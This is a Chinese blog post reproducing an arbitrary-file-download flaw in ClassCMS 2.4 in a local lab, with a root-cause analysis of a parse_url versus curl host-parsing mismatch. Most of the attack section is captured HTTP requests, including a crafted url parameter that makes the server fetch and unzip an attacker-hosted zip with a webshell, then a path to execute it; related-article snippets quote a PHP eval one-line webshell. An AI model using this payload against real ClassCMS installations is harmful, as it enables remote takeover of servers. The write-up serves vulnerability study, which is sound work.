ClassCMS2.4漏洞复现

已于 2023-11-30 16:56:51 修改
阅读量657 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 系统安全 网络 web安全
于 2023-11-30 16:55:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/134715976
版权

  • ClassCMS2.4漏洞复现

    • 环境搭建

    • 任意文件下载漏洞复现

    • 漏洞成因

ClassCMS2.4漏洞复现

CMS源码在附件中

环境搭建

使用phpstudy2016搭建web环境,php版本为5.5
安装CMS
这里选择Mysql数据库进行安装

图片

用户名和密码都写默认的admin方便记忆
输入完成后点击安装

图片

点击安装

图片

CMS的安装过程中有个报错忽略就好,登录不进后台的话刷新一下页面

进入了ClassCMS的后台

图片

任意文件下载漏洞复现

在后台访问应用商店

图片

任意点击一个下载

图片


进入下载页面后点击 下载 进行抓包

图片

我们先放掉第一个包

图片

POST /admin?do=shop:index&ajax=1&action=fileurl&from=install HTTP/1.1

Host: 192.168.12.144

Content-Length: 47

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.12.144

Referer: http://192.168.12.144/admin?do=shop:index&bread=%E8%B0%83%E8%AF%95%E5%BC%80%E5%85%B3&action=detail&classhash=debugswitch

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: token_9a9fe8=e0c7aacedb82db0c1522667cbf0bc806; csrf_9a9fe8=b472e230

Connection: close



classhash=debugswitch&version=1.0&csrf=b472e230

然后修改第二个请求包

图片

//第二个数据包



POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1

Host: classcms

Content-Length: 85

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.159.1

Referer: http://192.168.159.1/ClassCMS/admin666?do=shop:index&bread=%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91&action=detail&classhash=classcreate

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: token_2ab421=5d012ca838cc5f0aff02c44c8e2c91e7; csrf_2ab421=338ceb00

Connection: close



classhash={dir}&url=http://@{ip}:{port}@classcms.com/{shell.zip}&csrf=b472e230

数据包参数解析

classhash为解压出来的最后文件名

url为了绕过过滤设成如下形式

http://@ip:80@classcms.com/shell.zip

远程ip端口(默认80也需要加上),一个包含木马文件(shell.php)的zip压缩包

csrf参数不动即可

发送之后返回:下载完成

就说明已经成功被下载到目标服务器上并解压

最后访问url即可执行上传上的木马getshell

http://ip/class/{classhash的值}/{上传压缩包中的木马文件}

我们安装上面的格式修改数据包上传一个木马文件

先在网站根目录创建一个木马文件,然后把他压缩成压缩包

图片

图片

然后再重新构建第二个数据包

//第二个数据包



POST /admin666?do=shop:downloadClass&ajax=1 HTTP/1.1

Host: classcms

Content-Length: 85

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.159.1

Referer: http://192.168.159.1/ClassCMS/admin666?do=shop:index&bread=%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91&action=detail&classhash=classcreate

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: token_2ab421=5d012ca838cc5f0aff02c44c8e2c91e7; csrf_2ab421=b472e230

Connection: close



classhash=shell&url=http://@192.168.12.144:80@classcms.com/shell.zip&csrf=338ceb00

上传之前创建的shell.zip
classhash=shell&url=http://@192.168.12.144:80@classcms.com/shell.zip&csrf=b472e230
直接修改数据包后放包也可以
 

图片


把修改后的数据包提交
 

图片


提交成功

图片

访问http://192.168.12.144/class/shell/shell.php
 

图片


可以看到木马上传成功了,在本地也可以看到下载的shell.zip文件

图片

漏洞成因

经白盒测试发现在/class/shop/shop.php中
通过全局搜索,“下载完成”定位到此处

图片

图片


一处为在downloadClass函数中一处在upgradeClass函数中,观察功能显然是在downloadClass
 

图片


this(当前文件shop.php)->download函数下,定位到关键函数download
 

图片

图片


函数首先获取了默认允许的host,在this(前文件下)->defaultHost函数中
定位函数defaultHost

图片


只允许 classcms.com;classcms.uuu.la
然后将我们传入的url (这里是http://http://192.168.12.144/shell.zip) 通过parse_url函数解析后在判断是否是在数组中
我们的攻击url也就是down在了这里,那么目标就是绕过这个判断然后执行接下来的curl命令​​​​​​​

if(!isset($checkurl['host']) || !in_array($checkurl['host'],$hosts)) {

Return false;

}

前一个条件存在是肯定满足的,那么只需要让经过parse_url解析过的host键值和数组相等即可

这里利用php中的parse_url函数和lib_curl对url的解析差异,导致了对host的过滤失效来进行绕过

php-curl拓展解析的url host在第首个@之后
而parse_url则是最后一个@之后
所以构造处payload

http://@http://192.168.12.144:80@classcms.com/shell.zip

看到这里了,点个“赞”、“再看”吧​​​​​​​

免费领取安全学习资料包!

黑客大佬
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
taocms 代码注入 (CVE-2022-25578)
qq_32445755的博客
06-12 1185
taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统.体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能。 taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。 上传.htaccess文件编辑添加AddType application/x-httpd-php .jpghttp://123.58.236.76:32064/pictures/month_2206/2022061
CVE-2022-25578 漏洞复现
Jay17的博客
02-12 813
CVE-2022-25578 漏洞复现
春秋云境靶场CVE-2022-25578漏洞复现(利用htaccess文件进行任意文件上传)
zyh1588的博客
11-15 1257
小白复现CVE-2022-25578漏洞
ClassCMS1.3自解压任意文件上传漏洞分析
weixin_42508548的博客
11-24 2594
0x01 前言 之前在某CMS也接触过自解压导致任意文件上传漏洞,只要对请求URL过滤不严谨,以及逻辑处理存在缺陷便可导致上传可控,直接一步获取服务器权限。本次通过分析ClassCMS源码,从原理上理解此类漏洞。代审小白,分析不到位请大佬们多多体谅。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、部署cms源码 3、访问http://192.168.150.9/index.php进行安装 4、输入相应配置信息,安装
vulfocus复现:spring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 3877
vulfocus复现:spring 命令执行 (CVE-2022-22947)
【Vulfocus漏洞复现】spring-core-rce-2022-03-29
weixin_45632448的博客
04-15 5398
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。 漏洞利用条件 1、A
spring_cloud_rce(CVE-2022-22947)漏洞复现
3tefanie丶zhou的博客
03-19 5404
【自己觉得不好的事情,就干脆不要有第一次,一次也不要做,一小步也不能走出去,要不然回头来看,吃亏吃苦的还是自己。】
ClassCMS 2.4代码审计1
08-03
ClassCMS 2.4 代码审计:深入理解任意远程文件下载漏洞ClassCMS 2.4 版本在安全审计过程中发现了一个严重的漏洞,该漏洞涉及到后台管理功能中的任意远程文件下载风险。这个安全问题被先知社区的专业安全技术...
ClassCMS内容管理系统 v2.4
02-03
ClassCMS内容管理系统是一款简单、灵活、安全、易于拓展的内容管理系统。 ClassCMS特点: 安全稳定,代码精简,安装包不到1M,没有多余的功能。 ... 在APACHE、NGINX、IIS上都能...v2.4 更新说明 解决了一些已知问题。
ClassCMS v1.2
01-12
为您提供ClassCMS下载,ClassCMS是一款简单、灵活、安全、易于拓展的内容管理系统。特点:安全稳定,代码精简,安装包不到1M,没有多余的功能。兼容PHP5.2--PHP8.0。在APACHE、NGINX、IIS上都能使用。支持MySQL、...
ClassCMS内容管理系统-PHP
06-20
ClassCMS是一款简单、灵活、安全、易于拓展的内容管理系统。 特点: 安全稳定,代码精简,安装包不到1M,没有多余的功能。 兼容PHP5.2--PHP8.0。 在APACHE、NGINX、IIS上都能使用。 支持MySQL、SQLite数据库。 拥有...
ClassCMS内容管理系统 1.5
04-30
ClassCMS是一款简洁灵活的开源内容管理系统,能非常方便的通过它快速开发各种网站应用,兼容PHP5.2-PHP8.0,在APACHE、NGINX、IIS上都能使用,默认支持MySQL SQLite两种...ClassCMS 1.3 更新日志:2021-03-22bug修复。
NVIDIA GPU Display Driver 越界写入漏洞CVE-2022-28181)
murphysec的博客
05-18 766
CVE-2022-28181 漏洞是 NVIDIA GPU Display Driver内核模式层中的漏洞,导致网络上的非特权普通用户可以通过crafted shader越界写入。该漏洞影响范围一般,但影响的范围可能会扩展到其他组件。官方已发布新版本,建议受影响用户升级到安全版本。 编号      CVE-2022-28181 标题 NVIDIA GPU Display Driver 越界写入漏洞 描述 英伟达(NVIDIA)是一家专注于交互式图形产品的公司。其适用于 Windows 和
[漏洞分析] CVE-2022-25636 netfilter内核提权
Breeze的博客
03-20 1万+
CVE-2022-25636 netfilter内核提权 文章目录CVE-2022-25636 netfilter内核提权漏洞简介环境搭建漏洞原理漏洞发生点调用栈netfilter的使用以及触发漏洞利用泄露内核net_device结构体地址setxattr来UAF泄露kaslr二次UAF完成内核rop参考 漏洞简介 漏洞编号: CVE-2022-25636 漏洞产品: linux kernel - netfilter 影响版本: linux kernel 5.4 ~ 漏洞危害: netfilter 内核模块
[漏洞分析] CVE-2022-0185 linux 内核提权(逃逸)
热门推荐
Breeze的博客
02-18 1万+
CVE-2022-0185 分析 文章目录CVE-2022-0185 分析漏洞简介环境搭建漏洞原理漏洞复现POC漏洞利用EXP参考 漏洞简介 漏洞编号: CVE-2022-0185 漏洞产品: linux kernel - fsconfig syscall 影响版本: linux kernel 5.1-rc1 ~ 源码获取: apt source linux-image-unsigned-5.13.0-25-generic 或 https://mirrors.edge.kernel.org/pub/linu
CVE-2022-21882 分析&POC
qq_41252520的博客
04-29 2221
0x0 漏洞描述 该漏洞的成因和CVE-2021-1732类似,如果不了解,请先阅读我之前的分析:https://blog.csdn.net/qq_41252520/article/details/119349398 主要因为xxxClientAllocExtraBytesFunc\textcolor{cornflowerblue}{xxxClientAllocExtraBytesFunc}xxxClientAllocExtraBytesFunc函数会回调用户空间中的 user32!_xxxClientA
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8802
CVE-2022-33891漏洞原理、环境搭建和复现
CVE-2020-25790(typesetter 文件上传
beirry的博客
11-24 1270
vulfocus-typesetter 文件上传CVE-2020-25790) 从web端进入CMS,点击已上传的档案页面 准备test.php文件,文件内容如下 <?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码 将test.php上传到该页面,出现报错,报错内容是permission denied. 将test.php压缩成zip文件,再次上传 上传成功,解压test.zip文件 test.php文件解压成功 获取t
AI安全-文生图
最新发布
深度安全实验室
08-15 548
AI安全-文生图
classcms 代码审计
10-22
classcms是一款常见的内容管理系统,其代码审计是对其源代码进行逐行检查和分析的过程。通过代码审计,我们可以评估classcms安全性和漏洞风险,并提供相应的修复建议。 首先,代码审计可以检查classcms的输入验证和过滤机制是否健全。这包括用户输入的数据是否被适当地过滤和转义,以防止SQL注入、跨站脚本攻击等常见的漏洞。 其次,代码审计可以查看classcms是否存在任何明显的安全漏洞。例如,是否有未经验证的文件上传功能,是否在用户身份验证过程中使用了弱密码加密算法,是否以明文存储敏感信息等。如果发现这些问题,就需要及时修复以提升系统的安全性。 此外,代码审计还可以识别潜在的业务逻辑漏洞。例如,classcms是否存在会话固定、越权访问等安全问题,是否正确实现了用户权限控制,以及用户身份验证是否完整和准确。这些问题的存在可能会导致未授权的用户访问敏感数据或执行特权操作。 最后,代码审计还可以检查classcms是否使用最新的安全修复程序。定期更新classcms以及相关的第三方库和插件是保持系统安全的重要措施之一。通过代码审计,可以排查是否有遗漏的安全补丁,以保障classcms处于一个相对安全的状态。 总之,通过代码审计,我们可以全面了解classcms安全性,并提供相关的修复建议,以帮助系统管理者和开发者提升classcms安全性水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值